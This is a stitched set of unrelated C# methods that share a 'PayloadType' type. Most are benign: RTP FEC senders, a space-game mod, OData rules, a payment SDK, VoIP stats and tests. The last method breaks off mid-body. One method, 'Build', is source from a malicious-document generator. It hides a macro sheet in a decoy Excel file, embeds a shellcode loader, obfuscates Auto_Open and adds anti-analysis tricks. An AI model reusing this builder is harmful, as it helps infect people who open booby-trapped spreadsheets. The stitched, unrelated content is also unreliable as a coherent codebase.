/// <summary> /// Class factory for creating all RtpSenders /// </summary> internal static RtpSender CreateInstance(IRtpSession session, string name, PayloadType pt, Hashtable priExns, Hashtable paraPay) { if(priExns != null) { // Fec RtpSenders string fecData = (string)priExns[Rtcp.PEP_FEC]; if(fecData != null) { string[] args = fecData.Split(new char[]{':'}); ushort cDataPx = ushort.Parse(args[0]); ushort cFecPx = ushort.Parse(args[1]); // Validates in case private extensions were modified elsewhere than method below if(cFecPx == 0) { throw new ArgumentOutOfRangeException("cFecPx", cFecPx, "Must be >= 1"); } if(cDataPx == 0) { // Frame based Fec return new RtpSenderFFec(session, name, pt, priExns, cFecPx); } else { // Constant Fec return new RtpSenderCFec(session, name, pt, priExns, cDataPx, cFecPx); } } } // Regular old RtpSender return new RtpSender(session, name, pt, priExns, paraPay); }
/// <summary> /// Constructs a frame for Sending /// </summary> public RtpFrame(uint packetSize, PayloadType payloadType, Hashtable payloadPara, uint timeStamp) { this.packetSize = packetSize; this.payloadType = payloadType; this.payloadPara = payloadPara; this.timeStamp = timeStamp; }
public PayloadChannel CreateChannel(PayloadType aType) { PayloadChannel aChannel = new PayloadChannel(aType); AddChannel(aChannel); return aChannel; }
public QueryParameters( PayloadType? payload, IScopeParameters scopeParameters, IEnumerable<string> fields) { this.Payload = payload; this.ScopeParameters = scopeParameters; this.Fields = fields; }
private bool checkPayloadTypeAttributeApproxEq(PayloadType type) { switch (type) { case PayloadType.Altitude: case PayloadType.Terrain_altitude: return Math.Abs(Attributes.prev_altitude - FlightGlobals.ActiveVessel.altitude) < Attributes.ALTITUDE_APPROX_EQUALITY; case PayloadType.Apoapsis: return Math.Abs(Attributes.prev_apoapsis - FlightGlobals.ActiveVessel.orbit.ApA) < Attributes.ALTITUDE_APPROX_EQUALITY; case PayloadType.Apoapsis_r: return Math.Abs(Attributes.prev_apoaps_r - FlightGlobals.ActiveVessel.orbit.ApR) < Attributes.ALTITUDE_APPROX_EQUALITY; case PayloadType.Orb_spd: return Math.Abs(Attributes.prev_orb_spd - FlightGlobals.ActiveVessel.obt_speed) < Attributes.SPEED_APPROX_EQUALITY; case PayloadType.Periapsis: return Math.Abs(Attributes.prev_periapsis - FlightGlobals.ActiveVessel.orbit.PeA) < Attributes.ALTITUDE_APPROX_EQUALITY; case PayloadType.Periapsis_r: return Math.Abs(Attributes.prev_periaps_r - FlightGlobals.ActiveVessel.orbit.PeR) < Attributes.ALTITUDE_APPROX_EQUALITY; case PayloadType.Stage: return Attributes.prev_stage == FlightGlobals.ActiveVessel.currentStage; case PayloadType.Surf_spd: return Math.Abs(Attributes.prev_surf_spd - FlightGlobals.ActiveVessel.srfSpeed) < Attributes.SPEED_APPROX_EQUALITY; case PayloadType.T_t_apo: return Math.Abs(Attributes.prev_t_t_apo - FlightGlobals.ActiveVessel.orbit.timeToAp) < Attributes.GAME_TIME_APPROX_EQUAL; case PayloadType.T_t_peri: return Math.Abs(Attributes.prev_t_t_peri - FlightGlobals.ActiveVessel.orbit.timeToPe) < Attributes.GAME_TIME_APPROX_EQUAL; case PayloadType.Targ_dist: // TODO return true; case PayloadType.Targ_spd: return Math.Abs(Attributes.prev_targ_spd - FlightGlobals.ship_tgtSpeed) < Attributes.SPEED_APPROX_EQUALITY; case PayloadType.SOI_Num: return Attributes.prev_soi == ICCHelpers.SOI_to_SOI_Number(FlightGlobals.ActiveVessel.orbit.referenceBody.name); case PayloadType.Latitude: return Math.Abs(Attributes.prev_latitude - FlightGlobals.ActiveVessel.latitude) < Attributes.DEGREES_APPROX_EQUALITY; case PayloadType.Longitude: return Math.Abs(Attributes.prev_longitude - FlightGlobals.ActiveVessel.longitude) < Attributes.DEGREES_APPROX_EQUALITY; case PayloadType.Orbital_period: return Math.Abs(Attributes.prev_orb_per - FlightGlobals.ActiveVessel.orbit.period) < Attributes.GAME_TIME_APPROX_EQUAL; case PayloadType.Gee_force: return Math.Abs(Attributes.prev_gee_force - FlightGlobals.ActiveVessel.geeForce) < Attributes.SPEED_APPROX_EQUALITY; default: print("[ICC] ERROR. Trying to check attribute equality with invalid payload type"); return true; } }
internal static InMemFrame NewPayLoad(ulong conversationId, PayloadType payloadType, IBonded layerData, IMessage message, TaskCompletionSource<IMessage> taskSource) { var headers = new SimpleInMemHeaders { conversation_id = conversationId, payload_type = payloadType }; var payload = new InMemFrame { headers = headers, layerData = layerData, message = message, outstandingRequest = taskSource }; Validate(payload); return payload; }
/// <summary> /// Filters rules based on payload type and flag of media link entry. /// </summary> /// <param name="rules">The collection of input rules</param> /// <param name="payloadType">Payload type</param> /// <param name="isMediaLinkEntry">Flag of media link entry</param> /// <param name="projection">Flag of projected request</param> /// <returns>The subset of input rules that meet the conditions of payload type and media link entry flag</returns> private static IEnumerable<Rule> SelectRules(this IEnumerable<Rule> rules, PayloadType payloadType, bool isMediaLinkEntry, bool projection) { rules = from r in rules where !r.PayloadType.HasValue || r.PayloadType == payloadType select r; if (payloadType == PayloadType.Entry) { rules = from r in rules where !r.IsMediaLinkEntry.HasValue || r.IsMediaLinkEntry.Value == isMediaLinkEntry select r; } if (payloadType == PayloadType.Entry || payloadType == PayloadType.Feed) { rules = from r in rules where !r.Projection.HasValue || r.Projection.Value == projection select r; } return rules; }
/// <summary> /// get details of the stream...raw data and start tiume etc /// set up the stream senders associated with us. we have n, one active and the rest acting as buffers /// </summary> public StreamPlayer( RtpSession session, int newStreamID, ConferencePlayerPC cppc) { int maxFrameSize, maxFrameCount, maxBufferSize; // This occasionally throws due to bad data. Let ConferencePlayer handle it. DBHelper.GetStreamStatistics( newStreamID, out this.firstStreamTicks, out maxFrameSize, out maxFrameCount, out maxBufferSize); streamID = newStreamID; totalFramesSent = 0; totalBytesSent = 0; totalLateness = 0; buffers = new BufferPlayer[Constants.BuffersPerStream]; perfCounter = cppc; string payload; DBHelper.GetStreamAndParticipantDetails( streamID, out name, out payload, out cname, out privExtns ); streamPayload = (PayloadType)Enum.Parse( typeof(PayloadType), payload, true ); // for delayed buffers (late joiners), we create the rtpSender later this.rtpSession = session; Trace.WriteLine("Playing back stream: "+streamID+"; payload: "+streamPayload+"; name: "+ (cname + " : " +name)); // buffer n buffers worth of data long startingTick = this.firstStreamTicks; for ( int i = 0; i < buffers.Length; i++) { buffers[i] = new BufferPlayer( streamID, maxFrameSize, maxFrameCount, maxBufferSize); buffers[i].Populate( startingTick ); startingTick = buffers[i].LastTick + 1; perfCounter.AddInstanceForCollection(buffers[i]); } // first stream is initially active activeBufferIndex = 0; activeBuffer = buffers[activeBufferIndex]; }
internal RtpStreamFec(RtpListener rtpListener, uint ssrc, string ipaddress, SdesData sdes, PayloadType pt) : base(rtpListener, ssrc, ipaddress, sdes, pt) { this.getBufferHandler = rtpListener.GetBufferCallback; }
/// <summary> /// Generate an Excel Document with a hidden macro sheet that will execute code described by the payload argument. /// </summary> /// <param name="decoyDocument">File path to the base Excel 2003 sheet that should be visible to users.</param> /// <param name="payload">Either binary shellcode or a newline separated list of Excel Macros to execute</param> /// <param name="payload64Bit">Binary shellcode of a 64bit payload, payload-type must be Shellcode</param> /// <param name="payloadType">Specify if the payload is binary shellcode or a macro list. Defaults to Shellcode</param> /// <param name="preamble">Preamble macro code to include with binary shellcode payload type</param> /// <param name="macroSheetName">The name that should be used for the macro sheet. Defaults to Sheet2</param> /// <param name="outputFileName">The output filename used for the generated document. Defaults to output.xls</param> /// <param name="debugMode">Set this to true to make the program wait for a debugger to attach. Defaults to false</param> /// <param name="method">Which method to use for obfuscating macros. Defaults to ObfuscatedCharFunc. </param> public static void Build(FileInfo decoyDocument, FileInfo payload, FileInfo payload64Bit, string preamble, PayloadType payloadType = PayloadType.Shellcode, string macroSheetName = "Sheet2", string outputFileName = "output.xls", bool debugMode = false, SheetPackingMethod method = SheetPackingMethod.ObfuscatedCharFunc) { if (decoyDocument == null || payload == null) { Console.WriteLine("decoy-document and payload must be specified in Build mode. Run build -h for usage instructions."); return; } //Useful for remote debugging if (debugMode) { Console.WriteLine("Waiting for debugger to attach"); while (!Debugger.IsAttached) { Thread.Sleep(100); } Console.WriteLine("Debugger attached"); } List <BiffRecord> defaultMacroSheetRecords = GetDefaultMacroSheetRecords(); string decoyDocPath = decoyDocument.FullName; WorkbookStream wbs = LoadDecoyDocument(decoyDocPath); List <string> preambleCode = new List <string>(); if (preamble != null) { string preambleCodePath = new FileInfo(preamble).FullName; preambleCode = new List <string>(File.ReadAllLines(preambleCodePath)); } if (wbs.GetAllRecordsByType <SupBook>().Count > 0) { throw new NotImplementedException("Please use a decoy document with no existing Labels."); } WorkbookEditor wbe = new WorkbookEditor(wbs); wbe.AddMacroSheet(defaultMacroSheetRecords, macroSheetName, BoundSheet8.HiddenState.SuperHidden); List <string> macros = null; byte[] binaryPayload = null; byte[] binary64Payload = null; //TODO make this customizable int rwStart = 0; int colStart = 0xA0; int dstRwStart = 0; int dstColStart = 0; int curRw = rwStart; int curCol = colStart; switch (payloadType) { case PayloadType.Shellcode: macros = MacroPatterns.GetX86GetBinaryLoaderPattern(preambleCode, macroSheetName); binaryPayload = File.ReadAllBytes(payload.FullName); if (payload64Bit != null && payload64Bit.Exists) { binary64Payload = File.ReadAllBytes(payload64Bit.FullName); } break; case PayloadType.Macro: macros = MacroPatterns.ImportMacroPattern(File.ReadAllLines(payload.FullName).ToList()); break; default: throw new ArgumentException(string.Format("Invalid PayloadType {0}", payloadType), "payloadType"); } if (binaryPayload != null && binaryPayload.Length > 0) { wbe.SetMacroBinaryContent(binaryPayload, curRw, curCol, dstRwStart, dstColStart + 1, method); curRw = wbe.WbStream.GetFirstEmptyRowInColumn(colStart) + 1; if (rwStart > 0xE000) { curRw = 0; curCol += 1; } if (binary64Payload != null && binary64Payload.Length > 0) { wbe.SetMacroBinaryContent(binary64Payload, curRw, curCol, dstRwStart, dstColStart + 2, method); curRw = wbe.WbStream.GetFirstEmptyRowInColumn(colStart) + 1; if (rwStart > 0xE000) { curRw = 0; curCol += 1; } macros = MacroPatterns.GetMultiPlatformBinaryPattern(preambleCode, macroSheetName); } } wbe.SetMacroSheetContent(macros, curRw, curCol, dstRwStart, dstColStart, method); if (method == SheetPackingMethod.CharSubroutine || method == SheetPackingMethod.AntiAnalysisCharSubroutine) { ushort charInvocationRw = 0xefff; ushort charInvocationCol = 0x9f; wbe.AddLabel("\u0000", charInvocationRw, charInvocationCol, true, true); //Abuse a few comparison "features" in Excel //1. Null bytes are ignored at the beginning and start of a label. //2. Comparisons are not case sensitive, A vs a or Ḁ vs ḁ //3. Unicode strings can be "decomposed" - ex: Ḁ (U+1E00) can become A (U+0041) - ◌̥ (U+0325) //4. The Combining Grapheme Joiner (U+034F) unicode symbol is ignored at any location in the string in SET.NAME functions wbe.AddLabel(UnicodeHelper.UnicodeArgumentLabel, null, true, true); //Using lblIndex 2, since that what var has set for us wbe.AddFormula( FormulaHelper.CreateCharInvocationFormulaForLblIndex(charInvocationRw, charInvocationCol, 2)); } wbe.AddLabel("Auto_Open", rwStart, colStart); wbe.ObfuscateAutoOpen(); ExcelDocWriter writer = new ExcelDocWriter(); string outputPath = AssemblyDirectory + Path.DirectorySeparatorChar + outputFileName; Console.WriteLine("Writing generated document to {0}", outputPath); writer.WriteDocument(outputPath, wbe.WbStream); }
/// <summary> /// Connect up a branch of the graph for network sending. Source filter should already be in the graph. /// DVSplitter and compressor may also already be connected, but for uncompressed cases, the Splitter /// may not be there yet. /// </summary> /// <param name="rtpSender"></param> /// <param name="payload"></param> public override void RenderNetwork(RtpSender rtpSender, PayloadType payload) { if (rtpSender == null) { string msg = Strings.NullRtpSenderError; Debug.Fail(msg); throw new ArgumentNullException(Strings.RtpSender, msg); } //Splitter may not yet be added in network scenarios without compression if (!this.AddDVSplitter()) { throw new ApplicationException("Failed to add DV Splitter"); } networkContext = true; if (payload == PayloadType.dynamicVideo) { videoRenderer = (Renderer)Filter.NetworkRenderer(); ((IRtpRenderer)videoRenderer.BaseFilter).Initialize2(rtpSender, this.rtpRendererFlags); iGB.AddFilter(videoRenderer.BaseFilter, videoRenderer.FriendlyName); videoRenderer.AddedToGraph(fgm); iGB.Connect(videoCompressor != null ? videoCompressor.OutputPin : splitterVideoOut, videoRenderer.InputPin); } else if (payload == PayloadType.dynamicAudio) { audioRenderer = (Renderer)Filter.NetworkRenderer(); ((IRtpRenderer)audioRenderer.BaseFilter).Initialize2(rtpSender, this.rtpRendererFlags); iGB.AddFilter(audioRenderer.BaseFilter, audioRenderer.FriendlyName); audioRenderer.AddedToGraph(fgm); iGB.Connect(audioCompressor != null ? audioCompressor.OutputPin : splitterAudioOut, audioRenderer.InputPin); } }
public virtual void RenderNetwork(RtpSender rtpSender, PayloadType payload) { RenderNetwork(rtpSender); }
/// <summary> /// Creates an RtpSender with Forward Error Correction /// /// This RtpSender sends the data requested by the user, plus some extra data in order to /// help recover lost data. The recovery packets are sent per the specified ratio of /// cDataPx : cFecPx, e.g. 3:1 means for every 3 data packets we will send 1 fec packet. /// This means we can lose any 1 of the 4 packets and recover the data. 3:2 means we /// can lose any 2 of the 5 and still recover the data. /// /// It takes 1 FEC packet to recover 1 lost data packet. It is important to balance the /// extra CPU and network bandwidth against the reliability of the data. Increasing either /// CPU or network bandwidth too much may cause worse data loss than not correcting at all. /// /// If the FEC ratio uses only 1 FEC packet (2:1, 3:1, etc.) we use an XOR algorithm, which /// is very fast. If the ratio uses more than one FEC packet (3:2, 5:3, etc.), we use the /// Reed-Solomon algorithm. Reed-Solomon is more complicated and therefore requires more /// CPU, however it allows you to recover from a broader range of loss patterns. /// </summary> /// <param name="Name">string Friendly Name of the device/sender of this RtpStream</param> /// <param name="payloadType">Rtp Payload Type</param> /// <param name="priExns">Private extensions for this RtpSender/Stream</param> /// <param name="dataPackets">Count of data packets to protect with FEC packets</param> /// <param name="perFECPackets">Count of FEC packets to protect data, 1:1 recovery</param> public RtpSender CreateRtpSenderFec(string name, PayloadType pt, Hashtable priExns, ushort cDataPx, ushort cFecPx) { ValidateRtpTraffic(); RtpSender rtpSender = RtpSender.CreateInstance(this, name, pt, priExns, cDataPx, cFecPx); _CreateRtpSender(rtpSender); return rtpSender; }
internal RtpSenderCFec(IRtpSession session, string name, PayloadType pt, Hashtable priExns, ushort cDataPx, ushort cFecPx) : base(session, name, pt, priExns, null) { pcFecType = 1; this.cDataPx = cDataPx; this.cFecPx = cFecPx; SetEncoder(); InitializeDCStorage(); }
public byte[] GetNextWrittenChunk(PayloadType type) => _writtenChunks.GetValueOrDefault(type, new Queue <List <byte> >(0)).Dequeue().ToArray();
private void timerTick(Object sender, EventArgs args) { LinphoneCall call = ((InCallModel)ViewModel).GetCurrentCall(); if (call == null) { return; } startTime = (DateTimeOffset)call.CallStartTimeFromContext; DateTimeOffset now = DateTimeOffset.Now; TimeSpan elapsed = now.Subtract(startTime); var hh = elapsed.Hours; var ss = elapsed.Seconds; var mm = elapsed.Minutes; Status.Text = hh.ToString("00") + ":" + mm.ToString("00") + ":" + ss.ToString("00"); string audioPayloadType = ""; string audioDownloadBandwidth = ""; string audioUploadBandwidth = ""; string videoPayloadType = ""; string videoDownloadBandwidth = ""; string videoUploadBandwidth = ""; LinphoneCallParams param = call.GetCurrentParamsCopy(); ((InCallModel)ViewModel).MediaEncryption = param.MediaEncryption.ToString(); LinphoneCallStats audioStats = null; try { audioStats = call.AudioStats; } catch { } if (audioStats != null) { audioDownloadBandwidth = String.Format("{0:0.00}", audioStats.DownloadBandwidth); audioUploadBandwidth = String.Format("{0:0.00}", audioStats.UploadBandwidth); ((InCallModel)ViewModel).ICE = audioStats.IceState.ToString(); } PayloadType audiopt = param.UsedAudioCodec; if (audiopt != null) { audioPayloadType = audiopt.MimeType + "/" + audiopt.ClockRate; } if (param.VideoEnabled) { LinphoneCallStats videoStats = call.VideoStats; if (videoStats != null) { videoDownloadBandwidth = String.Format("{0:0.00}", videoStats.DownloadBandwidth); videoUploadBandwidth = String.Format("{0:0.00}", videoStats.UploadBandwidth); } PayloadType videopt = param.UsedVideoCodec; if (videopt != null) { videoPayloadType = videopt.MimeType; } Windows.Foundation.Size receivedVideoSize = param.ReceivedVideoSize; String NewReceivedVideoSize = String.Format("{0}x{1}", receivedVideoSize.Width, receivedVideoSize.Height); String OldReceivedVideoSize = ((InCallModel)ViewModel).ReceivedVideoSize; if (OldReceivedVideoSize != NewReceivedVideoSize) { ((InCallModel)ViewModel).ReceivedVideoSize = String.Format("{0}x{1}", receivedVideoSize.Width, receivedVideoSize.Height); ((InCallModel)ViewModel).IsVideoActive = false; if (NewReceivedVideoSize != "0x0") { ((InCallModel)ViewModel).IsVideoActive = true; } } Windows.Foundation.Size sentVideoSize = param.SentVideoSize; ((InCallModel)ViewModel).SentVideoSize = String.Format("{0}x{1}", sentVideoSize.Width, sentVideoSize.Height); ((InCallModel)ViewModel).VideoStatsVisibility = Visibility.Visible; } else { ((InCallModel)ViewModel).VideoStatsVisibility = Visibility.Collapsed; } string downloadBandwidth = audioDownloadBandwidth; if ((downloadBandwidth != "") && (videoDownloadBandwidth != "")) { downloadBandwidth += " - "; } if (videoDownloadBandwidth != "") { downloadBandwidth += videoDownloadBandwidth; } ((InCallModel)ViewModel).DownBandwidth = String.Format("{0} kb/s", downloadBandwidth); string uploadBandwidth = audioUploadBandwidth; if ((uploadBandwidth != "") && (videoUploadBandwidth != "")) { uploadBandwidth += " - "; } if (videoUploadBandwidth != "") { uploadBandwidth += videoUploadBandwidth; } ((InCallModel)ViewModel).UpBandwidth = String.Format("{0} kb/s", uploadBandwidth); string payloadType = audioPayloadType; if ((payloadType != "") && (videoPayloadType != "")) { payloadType += " - "; } if (videoPayloadType != "") { payloadType += videoPayloadType; } ((InCallModel)ViewModel).PayloadType = payloadType; }
public bool HasPendingChunks(PayloadType type) => _writtenChunks.TryGetValue(type, out var pendingChunks) && pendingChunks.Count > 0;
/// <summary> /// Remove everything downstream from the DVSplitter for the specified payload type /// </summary> /// <param name="payload"></param> public override void RemoveFiltersDownstreamFromSource(PayloadType payload) { RemoveFiltersDownstreamFromSplitter(payload); }
/// <summary> /// Remove everything downstream from the DVSplitter for the specified payload type /// </summary> /// <param name="payload"></param> public override void RemoveCompressor(PayloadType payload) { RemoveFiltersDownstreamFromSplitter(payload); }
public static int getsize(PayloadType type) { switch (type) { case PayloadType.Stage: return sizeof(int); case PayloadType.SOI_Num: return sizeof(byte); case PayloadType.Latitude: case PayloadType.Longitude: return sizeof(float); default: return sizeof(double); } }
protected override void PrepareSequence(ref ReadOnlySequence <byte> sequence, PayloadType payloadType) { }
/// <summary> /// // Whether Int64, Decimal or Count are formatted as string in entry or feed. /// </summary> /// <param name="jo">The response payload object.</param> /// <param name="type">The payload type of object.</param> /// <param name="odataCount">The odata.count annotation name.</param> /// <returns>true:Int64 or Decimal or feed count are formatted as string; false:otherwise; null: not applicable.</returns> private bool? IsInt64OrDecimalAsString(JObject jo, PayloadType type, string odataCount) { bool? isInt64OrDecimalAsString = null; if (type == RuleEngine.PayloadType.Entry) { foreach (JProperty jProp in jo.Children()) { if (jProp.Name.EndsWith(Constants.V4OdataType) && !jProp.Name.Equals(Constants.V4OdataType) && (jProp.Value.ToString().StripOffDoubleQuotes().Equals("#Decimal") || jProp.Value.ToString().StripOffDoubleQuotes().Equals("#Int64"))) { if (((JProperty)jProp.Next).Value.Type == JTokenType.String) { isInt64OrDecimalAsString = true; } else { isInt64OrDecimalAsString = false; break; } } } } else if (type == RuleEngine.PayloadType.Feed) { foreach (JProperty jp in jo.Children<JProperty>()) { if (jp.Name.Equals(odataCount)) { if (((JProperty)jp).Value.Type == JTokenType.String) { isInt64OrDecimalAsString = true; } else { isInt64OrDecimalAsString = false; } break; } } foreach (JObject ob in (JArray)jo[Constants.Value]) { bool? resultMiddle = IsInt64OrDecimalAsString(ob, RuleEngine.PayloadType.Entry, odataCount); if (resultMiddle.HasValue) isInt64OrDecimalAsString = resultMiddle; if (isInt64OrDecimalAsString == false) { break; } } } return isInt64OrDecimalAsString; }
protected override ValueTask SendAsync(PayloadType type, ReadOnlySequence <byte> sequence) => _sendHandler(this, type, sequence);
public RequestBase CreateRequest(HttpMethod httpMethod, string path, PayloadType payloadType, JObject payload, RequestOptions requestOptions) { if (string.IsNullOrEmpty(path)) { throw new MercadoPagoRestException("Uri can not be an empty string."); } if (httpMethod.Equals(HttpMethod.GET)) { if (payload != null) { throw new MercadoPagoRestException("Payload not supported for this method."); } } else if (httpMethod.Equals(HttpMethod.POST)) { //if (payload == null) //{ // throw new MercadoPagoRestException("Must include payload for this method."); //} } else if (httpMethod.Equals(HttpMethod.PUT)) { if (payload == null) { throw new MercadoPagoRestException("Must include payload for this method."); } } else if (httpMethod.Equals(HttpMethod.DELETE)) { if (payload != null) { throw new MercadoPagoRestException("Payload not supported for this method."); } } RequestBase request = new RequestBase { Request = (HttpWebRequest)WebRequest.Create(path) }; request.Request.Method = httpMethod.ToString(); if (requestOptions == null) { requestOptions = new RequestOptions(); } if (requestOptions.Timeout > 0) { request.Request.Timeout = requestOptions.Timeout; } if (!path.Contains("/oauth/token")) { request.Request.Headers.Add("Authorization", $"Bearer {(!string.IsNullOrEmpty(requestOptions.AccessToken) ? requestOptions.AccessToken : MercadoPagoSDK.OAuthAccessToken)}"); } request.Request.Headers.Add("x-product-id", MercadoPagoSDK.ProductId); request.Request.Headers.Add("x-tracking-id", MercadoPagoSDK.TrackingId); if (requestOptions.CustomHeaders != null) { foreach (KeyValuePair <string, string> header in requestOptions.CustomHeaders) { if (request.Request.Headers[header.Key] == null) { request.Request.Headers.Add(header.Key, header.Value); } } } if (requestOptions.TrackHeaders != null) { foreach (KeyValuePair <string, string> trackHeader in requestOptions.TrackHeaders) { if (request.Request.Headers[trackHeader.Key] == null && trackHeader.Value != null) { request.Request.Headers[trackHeader.Key] = trackHeader.Value; } } } if (payload != null) // POST & PUT { byte[] data; if (payloadType != PayloadType.JSON) { Dictionary <string, string> parametersDict = payload.ToObject <Dictionary <string, string> >(); StringBuilder parametersString = new StringBuilder(); parametersString.Append(string.Format("{0}={1}", parametersDict.First().Key, parametersDict.First().Value)); parametersDict.Remove(parametersDict.First().Key); foreach (KeyValuePair <string, string> value in parametersDict) { parametersString.Append(string.Format("&{0}={1}", value.Key, value.Value.ToString())); } data = Encoding.ASCII.GetBytes(parametersString.ToString()); } else { data = Encoding.ASCII.GetBytes(payload.ToString()); } request.Request.UserAgent = "MercadoPago DotNet MercadoPagoSDK/" + MercadoPagoSDK.Version; request.Request.ContentLength = data.Length; request.Request.ContentType = payloadType == PayloadType.JSON ? "application/json" : "application/x-www-form-urlencoded"; request.RequestPayload = data; } IWebProxy proxy = requestOptions.Proxy ?? (_proxy ?? MercadoPagoSDK.Proxy); request.Request.Proxy = proxy; return(request); }
internal RtpSenderFec(IRtpSession session, string name, PayloadType pt, Hashtable priExns, Hashtable paraPay) : base(session, name, pt, priExns, paraPay) { }
internal RtpSenderFFec(IRtpSession session, string name, PayloadType pt, Hashtable priExns, ushort cFecPx) : base(session, name, pt, priExns, null) { fecPercent = cFecPx; pcFecType = 2; }
public SlideStreamMgr(ArchiveTranscoderJob job, ArchiveTranscoderJobSegment segment, LogMgr logMgr, double fps, int width, int height) { this.job = job; this.segment = segment; this.logMgr = logMgr; if (width > 0 && height > 0) { this.outputWidth = width; this.outputHeight = height; } this.ticksBetweenFrames = (long)((double)Constants.TicksPerSec / fps); uncompressedMT = getUncompressedMT(this.outputWidth, this.outputHeight, fps); cancel = false; initialized = false; pptInstalled = Utility.CheckPptIsInstalled(); if ((!DateTime.TryParse(segment.StartTime, out start)) || (!DateTime.TryParse(segment.EndTime, out end))) { throw(new System.Exception("Failed to parse start/end time")); } this.nextFrameTime = start.Ticks; format = Utility.StringToPresenterWireFormatType(segment.PresentationDescriptor.PresentationFormat); payload = Utility.formatToPayload(format); cname = segment.PresentationDescriptor.PresentationCname; slideImageMgr = new SlideImageMgr(format, this.outputWidth, this.outputHeight); //Get the start time for the entire conference and use that to get streams. long confStart = DatabaseUtility.GetConferenceStartTime(payload, cname, start.Ticks, end.Ticks); if (confStart <= 0) { logMgr.WriteLine("Warning: No conference exists in the database that matches this presentation: " + cname + " with PresentationFormat " + format.ToString()); logMgr.ErrorLevel = 7; confStart = start.Ticks; } //Get the relevant stream_id's and create DBStreamPlayers for each. streamIDs = DatabaseUtility.GetStreams(payload, segment.PresentationDescriptor.PresentationCname, null, confStart, end.Ticks); DateTime sdt = new DateTime(confStart); Debug.WriteLine("***Conference start: " + sdt.ToString() + " end: " + end.ToString()); if ((streamIDs == null) || (streamIDs.Length == 0)) { Debug.WriteLine("No presentation data found."); logMgr.WriteLine("Warning: No presentation data was found for the given time range for " + cname + " with PresentationFormat " + format.ToString()); logMgr.ErrorLevel = 7; streamPlayers = null; return; } streamPlayers = new DBStreamPlayer[streamIDs.Length]; for (int i = 0; i < streamIDs.Length; i++) { streamPlayers[i] = new DBStreamPlayer(streamIDs[i], confStart, end.Ticks, payload); } lookBehindDuration = 0; if (streamPlayers[0].Start < start) { lookBehindDuration = ((TimeSpan)(start - streamPlayers[0].Start)).TotalSeconds; } }
public virtual void RemoveFiltersDownstreamFromSource(PayloadType payload) { RemoveFiltersDownstreamFrom(source); }
public Header(ushort sender, ushort receiver, MessageType msgType, uint telegrammId, uint size, PayloadType type) : this() { SenderId = sender; ReceiverId = receiver; MsgType = msgType; TelegrammId = telegrammId; PayloadSize = size; PayloadType = type; }
public async Task <MPAPIResponse> ExecuteRequestAsync( HttpMethod httpMethod, string path, PayloadType payloadType, JObject payload, int requestTimeout, int retries) { System.Diagnostics.Trace.WriteLine("Payload " + httpMethod + " request to " + path + " : " + payload); try { if (string.IsNullOrEmpty(path)) { throw new MPRESTException("Uri can not be an empty string."); } ValidateMethodAndPayload(httpMethod, payload); var requestMethod = GetHttpMethod(httpMethod); var request = new HttpRequestMessage(requestMethod, path); var client = new HttpClient(); if (requestTimeout > 0) { client.Timeout = TimeSpan.FromSeconds(requestTimeout); } request.Headers.Add("HTTP.USER_AGENT", $"Lexim MercadoPago .NET SDK v{SDK.Version}"); if (payload != null) { string data; if (payloadType != PayloadType.JSON) { var formParams = payload.ToObject <Dictionary <string, string> >() .Select(x => $"{x.Key}={x.Value}"); var parametersString = string.Join("&", formParams); data = parametersString; } else { data = payload.ToString(); } var content = Encoding.ASCII.GetBytes(data); request.Content = new ByteArrayContent(content); request.Content.Headers.ContentLength = content.Length; request.Content.Headers.ContentType = payloadType == PayloadType.JSON ? new MediaTypeHeaderValue("application/json") : new MediaTypeHeaderValue("application/x-www-form-urlencoded"); } while (true) { try { var response = await client.SendAsync(request); var content = await response.Content.ReadAsByteArrayAsync(); return(new MPAPIResponse(httpMethod, request, payload, response, content)); } catch { if (--retries <= 0) { throw; } } } } catch (Exception ex) { throw new MPRESTException(ex.Message, ex); } }
/// <summary> /// Constructs a frame for Sending /// </summary> public RtpFrame(uint packetSize, PayloadType payloadType, uint timeStamp) { this.packetSize = packetSize; this.payloadType = payloadType; this.timeStamp = timeStamp; }
public FrameFunctionality() { // Testing PopFirstValue Console.WriteLine(""); Console.WriteLine("Testing PopFirstValue:"); FrameUtils frameUtils = new FrameUtils(Command.SUBSCRIBE, 123456789); frameUtils.AddVSKeyPairGetUtils("string_test", "true"); frameUtils.AddVSKeyPairGetUtils("bytes_test", Encoding.UTF8.GetBytes("false")); Frame frame = frameUtils.Build(); string falseValue = Encoding.UTF8.GetString(frame.PopFirstValue("bytes_test")); string trueValue = Encoding.UTF8.GetString(frame.PopFirstValue("string_test")); Console.WriteLine("false : " + falseValue); Console.WriteLine("true : " + trueValue); Console.WriteLine(" "); // Testing CorruptedFrameException Console.WriteLine(""); Console.WriteLine("Testing CorruptedFrameException:"); try { byte[] frameContent = Encoding.UTF8.GetBytes("helo 00000000000 0000000410 foobar\nend\n"); MemoryStream ns = new MemoryStream(frameContent); Frame.ReadFromStream(ns); } catch (CorruptedFrameException ex) { // Successfull Console.WriteLine("thrown CorruptedFrameException"); } // Testing Reading Verifying Signing Key Pair Frame Console.WriteLine(""); Console.WriteLine("Testing Reading Verifying Signing Key Pair Frame:"); string vsString = "pute 0000000099 0000001337\n" + "kv testKey 9\n" + "testValue\n" + "kv blahbla2 10\n" + "blahblahb2\n" + "kv lawlKey 6\n" + "foobar\n" + "end\n"; byte[] vsBytes = Encoding.UTF8.GetBytes(vsString); MemoryStream vsStream = new MemoryStream(vsBytes); Frame csFrame = Frame.ReadFromStream(vsStream); Console.WriteLine("Command: " + Command.PUT_ENTITY + " = " + csFrame.command); Console.WriteLine("Sequence number: " + "1337" + " = " + csFrame.sequenceNumber); Console.WriteLine("Number of VS key pais: " + "3" + " = " + csFrame.vsKeyPairs.Count); Console.WriteLine("Value from testKey: " + "testValue" + " = " + Encoding.UTF8.GetString(csFrame.PopFirstValue("testKey"))); Console.WriteLine("Empty list: false" + " = " + csFrame.routingObjects.Any()); //Testing Writing VSKeyPair Console.WriteLine(""); Console.WriteLine("Testing Writing VSKeyPair:"); FrameUtils writerUtils = new FrameUtils(Command.PUBLISH, 9876); writerUtils.AddVSKeyPairGetUtils("testKey1", "testValue1"); writerUtils.AddVSKeyPairGetUtils("testKey2", "testValue2"); Frame writerFrame = writerUtils.Build(); MemoryStream ns1 = new MemoryStream(); Stream bs1 = ns1; writerFrame.Write(bs1); string frameRetreived = Encoding.UTF8.GetString(ns1.ToArray()); string expectedFrameStr = "publ 0000000000 0000009876\n" + "kv testKey1 10\n" + "testValue1\n" + "kv testKey2 10\n" + "testValue2\n" + "end\n"; if (frameRetreived.Equals(expectedFrameStr)) { Console.WriteLine("Writing VSK test: They are equal."); } //Testing Writing PayloadObject Console.WriteLine(""); Console.WriteLine("Testing Writing PayloadObject:"); 